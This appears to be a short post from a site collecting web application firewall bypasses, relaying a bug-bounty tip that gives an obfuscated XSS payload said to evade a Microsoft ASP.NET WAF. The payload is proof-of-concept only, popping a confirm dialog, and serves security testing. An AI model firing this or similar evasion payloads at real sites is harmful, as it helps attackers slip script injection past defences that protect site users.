WAF bypass by grumpzsux

Date: May 20, 2024Author: wafbypass

This XSS bypass works on ASPNET Generic Microsoft WAF, detected by AFW00F. The payload used is '<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//'. More technical details can be found in the original tweet. #bugbounty #bugbountytip
For more details, check out the original tweet here: https://twitter.com/grumpzsux/status/1785194902352982480

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools

How to test, evaluate, compare, and bypass web application and API security solutions like WAF, NGWAF, RASP, and WAAP

WAF bypass by grumpzsux